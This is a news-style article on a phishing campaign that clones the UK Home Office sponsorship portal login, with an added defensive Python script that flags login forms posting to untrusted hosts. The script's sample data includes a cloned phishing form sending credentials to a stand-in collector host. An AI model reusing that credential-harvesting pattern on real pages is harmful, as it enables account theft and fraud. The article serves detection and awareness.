- Mimecast reveals phishing campaign targeting the British Home Office
- Accounts stolen through phishing emails and fake sites
- The fake sites can hardly be distinguished from the real ones
A phishing campaign aimed at the UK Home Office Sponsorship Management System (SMS) has been uncovered by Mimecast researchers.
The main goal of the campaign appears to be compromising account access, which can then be sold on the dark web, used to extort organizations through the theft of sensitive data, and used to create fraudulent Certificates of Sponsorship (CoS).
The campaign not only affects organizations holding a sponsorship licence, but threatens to undermine the entire British immigration system.
UK Home Office at risk
The attackers begin the campaign by sending emails that closely resemble legitimate emails sent by the Home Office, using the same branding and styling. The emails contain an urgent call to action that threatens account suspension if the user does not log in.
Victims are led to a fake login page via a CAPTCHA-gated URL that closely resembles the legitimate URL used by the Home Office. After completing the CAPTCHA, the user lands on a cloned Home Office login page.
The only difference between the legitimate and illegitimate pages is in the form: the fake page sends the entered credentials to an attacker-controlled script, after which the stolen credentials can be used to log in to the victim's account.
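The detail above, that the cloned page differs from the real one only in where its login form posts, is something a defender can check mechanically. The following is an added example written for this article, not code from Mimecast or the Home Office: it parses a captured login page, resolves every form action against the URL the page was served from, and flags any form that would send credentials to a host outside the trusted domain, as well as a page that is itself hosted on a lookalike domain. The host names, HTML and URLs below are constructed placeholders, not the real SMS portal or the campaign's infrastructure.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class FormActionCollector(HTMLParser):
    """Collect the action attribute of every <form> element on a page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            # attrs is a list of (name, value); value is None for bare attributes
            self.actions.append(dict(attrs).get("action") or "")


def is_trusted_host(host, trusted_hosts):
    """True if host equals a trusted host or is a subdomain of one."""
    h = (host or "").lower()
    return any(h == t.lower() or h.endswith("." + t.lower()) for t in trusted_hosts)


def form_submit_hosts(html, page_url):
    """Resolve each form action against the page URL and return the host it posts to.

    An empty or relative action posts back to the serving host, so a clone hosted on a
    lookalike domain is still caught even when its form carries no absolute action.
    """
    parser = FormActionCollector()
    parser.feed(html)
    return [urlparse(urljoin(page_url, a)).hostname or "" for a in parser.actions]


def assess_login_page(page_url, html, trusted_hosts):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings = []
    page_host = urlparse(page_url).hostname or ""
    if not is_trusted_host(page_host, trusted_hosts):
        findings.append(f"page host {page_host} is not a trusted host")
    for host in form_submit_hosts(html, page_url):
        if not is_trusted_host(host, trusted_hosts):
            findings.append(f"form posts credentials to {host}")
    return findings


# Constructed sample data (placeholders, not the real portal or campaign hosts).
TRUSTED_HOSTS = ("sms-portal.example.gov.uk",)

LEGIT_URL = "https://sms-portal.example.gov.uk/login"
LEGIT_HTML = """<html><body>
<form method="post" action="/login/authenticate">
  <input name="username"><input name="password" type="password">
</form></body></html>"""

# A lookalike host serving a page whose form posts to a separate collector script.
CLONE_URL = "https://sms-portal-example-gov.uk-secure-login.example.com/login"
CLONE_HTML = """<html><body>
<form method="post" action="https://collector.example.net/submit.php">
  <input name="username"><input name="password" type="password">
</form></body></html>"""


if __name__ == "__main__":
    for label, url, html in (("legitimate", LEGIT_URL, LEGIT_HTML),
                             ("clone", CLONE_URL, CLONE_HTML)):
        print(label, assess_login_page(url, html, TRUSTED_HOSTS) or ["no findings"])
```

Because the campaign gates the fake login page behind a CAPTCHA, an automated fetch of the reported URL will usually only see the CAPTCHA step; the page passed to `assess_login_page` has to be the post-CAPTCHA login page as captured from a browser or sandbox session.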
With the stolen accounts, the attacker can then create fake job offers and visa sponsorship schemes and charge victims tens of thousands of pounds to access them.
The best protection against phishing campaigns like this is constant vigilance: always check URLs and be wary of urgent calls to action.
A complete list of indicators for this phishing campaign can be found on the Mimecast blog.